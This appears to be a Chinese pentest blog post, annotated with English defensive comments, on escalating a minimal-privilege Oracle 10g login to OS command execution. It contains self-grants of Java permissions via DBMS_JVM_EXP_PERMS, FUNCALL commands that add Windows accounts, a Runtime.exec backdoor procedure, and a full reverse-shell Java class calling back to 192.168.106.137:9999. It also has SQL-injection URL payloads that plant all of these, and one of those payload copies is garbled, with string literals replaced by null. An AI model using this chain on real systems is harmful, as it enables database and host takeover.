-- Lab fixture: a throwaway account that holds nothing but CREATE SESSION, used
-- below to show how far a minimally privileged login gets on this 10.2.0.1 box.
-- Password == username is a lab-only shortcut; a real account would fail any
-- password policy and is the first thing a credential-stuffing scan tries.
create user xiaozi identified by xiaozi;
grant create session to xiaozi;
10g 低权限提升
C:\Documents and Settings\Administrator>sqlplus xiaozi/xiaozi@orcl
SQL*Plus: Release 10.2.0.1.0 - Production on 星期三 11月 2 00:30:37 2016
Copyright (c) 1982, 2005, Oracle. All rights reserved.
连接到:
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Production
With the Partitioning, OLAP and Data Mining options
SQL> select * from session_privs;
PRIVILEGE
----------------------------------------
CREATE SESSION
SQL>
-- Self-grant of a Java permission by a login that, per the session_privs
-- listing above, holds only CREATE SESSION. The cursor yields one policy row
-- (grantee 'xiaozi', java.io.FilePermission on <<ALL FILES>>, action 'execute')
-- and DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS applies it; the success message that
-- follows shows no elevated privilege was needed. Mitigation: move to a patch
-- level where this package no longer grants permissions on behalf of an
-- unprivileged caller, and check DBA_TAB_PRIVS for an EXECUTE grant on
-- DBMS_JVM_EXP_PERMS to PUBLIC — revoke it if present. Detection: object-audit
-- executions of DBMS_JVM_EXP_PERMS, and review DBA_JAVA_POLICY for grants held
-- by non-administrative schemas.
SQL> DECLARE
2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.io.FilePermission','<<ALL
FILES>>','execute','ENABLED' from dual;
4 BEGIN
5 OPEN C1;
6 FETCH C1 BULK COLLECT INTO POL;
7 CLOSE C1;
8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
9 END;
10 /
PL/SQL 过程已成功完成。
SQL>
-- Same self-grant pattern as the previous block, this time for
-- java.lang.RuntimePermission 'writeFileDescriptor' (no action column, hence
-- the NULL). Together with 'readFileDescriptor' in the next block these are
-- presumably the permissions the Java runtime needs to hand a spawned process
-- its stdin/stdout — confirm against the Oracle JVM policy documentation for
-- this release. Any appearance of these two permissions on an application
-- schema in DBA_JAVA_POLICY deserves an incident ticket, not a cleanup.
SQL> DECLARE
2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.lang.RuntimePermission','w
riteFileDescriptor',NULL,'ENABLED' FROM DUAL;
4 BEGIN
5 OPEN C1;
6 FETCH C1 BULK COLLECT INTO POL;
7 CLOSE C1;
8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
9 END;
10 /
PL/SQL 过程已成功完成。
SQL>
-- Third self-grant: java.lang.RuntimePermission 'readFileDescriptor'.
-- After this block the CREATE SESSION-only login holds the full set of Java
-- permissions used by the FUNCALL statements below; nothing in the database
-- privilege model (DBA_SYS_PRIVS / session_privs) changed, which is why a
-- review that only looks at database privileges misses this escalation —
-- DBA_JAVA_POLICY has to be part of the privilege audit.
SQL> DECLARE
2 POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY;
3 CURSOR C1 IS SELECT 'GRANT','xiaozi','SYS','java.lang.RuntimePermission','r
eadFileDescriptor',NULL,'ENABLED' FROM DUAL;
4 BEGIN
5 OPEN C1;
6 FETCH C1 BULK COLLECT INTO POL;
7 CLOSE C1;
8 DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
9 END;
10 /
PL/SQL 过程已成功完成。
SQL>
-- OS command execution through DBMS_JAVA_TEST.FUNCALL, which invokes main() of
-- the built-in class oracle/aurora/util/Wrapper with the remaining arguments as
-- argv: here cmd.exe /c dir with output redirected to c:\10gOUT.LST. The command
-- runs under the identity of the Oracle service process (on Windows that is
-- often LocalSystem — check the service configuration). Detection: EDR/Sysmon
-- process-creation telemetry showing cmd.exe as a child of the Oracle server
-- process, unexpected files in the drive root, and object audit on
-- DBMS_JAVA_TEST. Mitigation: patch, check DBA_TAB_PRIVS for a PUBLIC EXECUTE
-- grant on DBMS_JAVA_TEST and revoke it, and run the service as a dedicated
-- low-privileged account.
SQL> SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\wind
ows\\system32\\cmd.exe', '/c', 'dir>c:\\10gOUT.LST') FROM DUAL;
DBMS_JAVA_TEST.FUNCALL('ORACLE/AURORA/UTIL/WRAPPER','MAIN','C:\\WINDOWS\\SYSTEM3
--------------------------------------------------------------------------------
-- Same primitive, now creating a local Windows account ('net user ... /add').
-- This is the loudest step in the whole chain: it writes Windows Security event
-- 4720 (user account created) on the database host with the Oracle service
-- account as the subject, and a database service account creating OS users is
-- an alert-worthy condition on its own. The account persists after the database
-- session ends, so host-side review should enumerate local users, not just
-- database objects.
SQL> SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\wind
ows\\system32\\cmd.exe','/c','net user abc abc /add') FROM DUAL;
DBMS_JAVA_TEST.FUNCALL('ORACLE/AURORA/UTIL/WRAPPER','MAIN','C:\\WINDOWS\\SYSTEM3
--------------------------------------------------------------------------------
Oracle 10g web注入技巧
-- Java stored-procedure backdoor: compiles a class whose only method hands its
-- argument verbatim to Runtime.exec, so any schema granted EXECUTE on the PL/SQL
-- wrapper (MYJAVACMD below) gets OS command execution as the database service
-- account. Creating it in the victim schema presumably needs CREATE PROCEDURE
-- there, or a route (such as the injection payloads further down) that runs the
-- DDL as a more privileged user — confirm against the grants on the affected
-- system. Detection: enable statement auditing for procedure/Java object
-- creation (confirm which audit option covers CREATE JAVA on your release), and
-- periodically list DBA_OBJECTS with OBJECT_TYPE IN ('JAVA SOURCE','JAVA CLASS')
-- owned by application schemas; on the host, watch for child processes of the
-- Oracle server process.
create or replace and resolve java source named JAVACMD as
import java.lang.*;
import java.io.*;
public class JAVACMD
{
// Runs an arbitrary OS command line. Nothing is validated, the process is not
// waited on, and its output is discarded.
public static void execmd(String command) throws IOException
{
Runtime.getRuntime().exec(command);
}
}
-- PL/SQL call spec exposing JAVACMD.execmd as MYJAVACMD; its single VARCHAR
-- argument is the OS command line. The exec line runs 'net user' (lists local
-- Windows accounts) as a smoke test. Executing it presumably requires the Java
-- runtime permissions granted earlier on the page (execute FilePermission plus
-- the read/writeFileDescriptor RuntimePermissions) — confirm in
-- DBA_JAVA_POLICY. A call spec whose Java body is Runtime.exec is a reliable
-- hunting query: join DBA_PROCEDURES / DBA_SOURCE for 'language java name' and
-- review the referenced classes.
create or replace procedure MYJAVACMD(command in varchar) as language java
name 'JAVACMD.execmd(java.lang.String)';
exec MYJAVACMD('net user');
web: http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;
begin execute immediate ''create or replace and resolve java source named JAVACMD as import java.lang.*;import java.io.*;public
class JAVACMD{public static void execmd(String command) throws IOException{Runtime.getRuntime().exec(command);}} ''; commit;
end;') from dual) is not null
web: http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;
begin execute immediate ''create or replace procedure MYJAVACMD(command in varchar) as language java name
''''JAVACMD.execmd(java.lang.String)''''; ''; commit;end;') from dual) is not null
web :http://192.168.91.106/test.jsp?id=123 and (select dbms_xmlquery.newcontext('begin myjavacmd(''net user admin admin /add'')
;commit;end;') from dual) is not null
-- Reverse-shell Java stored procedure: the class connects OUT from the database
-- host to addr:str_port, reads one line at a time from that socket, runs each
-- line as an OS command and returns the command's stdout over the same
-- connection until the peer sends "BYE". Exposed to SQL via myjavasocket below.
-- Detection: an outbound TCP session originating from the Oracle server process
-- to a non-database port (egress firewall / NetFlow / EDR network telemetry), a
-- fan-out of short-lived child processes under that process, and JAVA
-- SOURCE / JAVA CLASS objects appearing in application schemas. Mitigation:
-- deny egress from database hosts by default, keep Java permissions
-- (SocketPermission, execute FilePermission) off non-admin schemas — check
-- DBA_JAVA_POLICY — and audit Java object creation.
create or replace and compile java source named javasocket as
import java.net.*;
import java.io.*;
import java.lang.*;
public class javasocket
{
// addr/str_port are taken verbatim from the PL/SQL caller; str_port is parsed
// with Integer.parseInt, so a non-numeric port ends up in the outer catch.
public static void test(String addr,String str_port)
{
Socket socket;
String len; // unused
String s;
InputStream Is;
OutputStream Os;
DataInputStream DIS;
PrintStream PS;
try{
socket=new Socket(addr,Integer.parseInt(str_port));
Is=socket.getInputStream();
Os=socket.getOutputStream();
DIS=new DataInputStream(Is);
PS=new PrintStream(Os);
// Command loop: one line in, one command out. Ends on "BYE" or when a read
// fails and the exception reaches the outer catch.
while(true){
s=DIS.readLine();
if(s.trim().equals("BYE"))break;
try{
Runtime rt = Runtime.getRuntime();
Process p = null;
p = rt.exec(s);
s = null;
// Only stdout is collected; stderr is never read.
BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
String msg = null;
while((msg = br.readLine())!=null){
msg += "\n";
s += msg;
}
br.close();
}
catch(Exception e)
{
// Any failure to spawn or read the process is reported to the peer as text.
s = "Please check your command!";
}
PS.println(s);
}
DIS.close();
PS.close();
Is.close();
Os.close();
socket.close();
}
catch(Exception e)
{
// Goes to the Oracle JVM's stdout, i.e. the server-side trace, not the caller.
System.out.println("Error:"+e);
}
}
}
-- Call spec exposing javasocket.test; address and port are passed straight
-- through to the Java socket constructor. The exec line dials the listener at
-- 192.168.106.137:9999 used in this write-up; in an investigation, that
-- host:port pair (and any other literal passed to this procedure) is the
-- indicator to pivot on in firewall and NetFlow logs.
create or replace procedure myjavasocket(address in varchar,port in varchar) as language java
name 'javasocket.test(java.lang.String,java.lang.String)';
exec myjavasocket('192.168.106.137','9999');
-- Clean-up of the two objects. Dropping them removes the artefacts from
-- DBA_OBJECTS, but audit records (where object/statement auditing was enabled),
-- redo/archive logs and any host-side process or network logs still show what
-- was done — those are where an investigation should look once the objects are
-- gone.
SQL> drop java source javasocket;
Java 已删除。
SQL> drop procedure myjavasocket;
过程已删除。
http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named javasocket as import java.net.*; import java.io.*;import java.lang.*;public class javasocket{public static void test(String addr,String str_port){Socket socket;String len;String s;InputStream Is;OutputStream Os;DataInputStream DIS;PrintStream PS;try{socket=new Socket(addr,Integer.parseInt(str_port));Is=socket.getInputStream();
Os=socket.getOutputStream();DIS=new DataInputStream(Is);PS=new PrintStream(Os);while(true){s=DIS.readLine();if(s.trim().equals("BYE"))break;try{Runtime rt =Runtime.getRuntime();Process p = null; p = rt.exec(s); s = null;BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));String msg = null;while((msg = br.readLine())!=null){ msg += "\n"; s += msg;}br.close();}catch(Exception e){s = "Please check your command!";}PS.println(s);} DIS.close(); PS.close(); Is.close(); Os.close(); socket.close();} catch(Exception e){System.out.println(e);}}}''; commit; end;') from dual) is not null--
http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name ''''javasocket.test(java.lang.String,java.lang.String)'''';''; commit;end;') from dual) is not null--
http://192.168.106.137:8080/test1.jsp?id=7782 and (select dbms_xmlquery.newcontext('begin myjavasocket(''192.168.106.137'',''9999'');commit;end;') from dual) is not null--
数字型注入和字符型注入的区别，只在于 id 参数值后是否多一个引号（对比前后两组 payload）。
http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named javasocket as import java.net.*; import java.io.*;import java.lang.*;public class javasocket{public static void test(String addr,String str_port){Socket socket;String len;String s;InputStream Is;OutputStream Os;DataInputStream DIS;PrintStream PS;try{socket=new Socket(addr,Integer.parseInt(str_port));Is=socket.getInputStream();
Os=socket.getOutputStream();DIS=new DataInputStream(Is);PS=new PrintStream(Os);while(true){s=DIS.readLine();if(s.trim().equals(null))break;try{Runtime rt =Runtime.getRuntime();Process p = null; p = rt.exec(s); s = null;BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));String msg = null;while((msg = br.readLine())!=null){ msg += null; s += msg;}br.close();}catch(Exception e){s = null;}PS.println(s);} DIS.close(); PS.close(); Is.close(); Os.close(); socket.close();} catch(Exception e){System.out.println(e);}}}''; commit; end;') from dual) is not null--
http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace procedure myjavasocket(address in varchar,port in varchar) as language java name ''''javasocket.test(java.lang.String,java.lang.String)'''';''; commit;end;') from dual) is not null--
http://192.168.106.137:8080/test1.jsp?id=7782' and (select dbms_xmlquery.newcontext('begin myjavasocket(''192.168.106.137'',''9999'');commit;end;') from dual) is not null--
最后
欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。
参考文章:
citeseerx.ist.psu.edu/viewdoc/dow…
www.notsosecure.com/hacking-ora…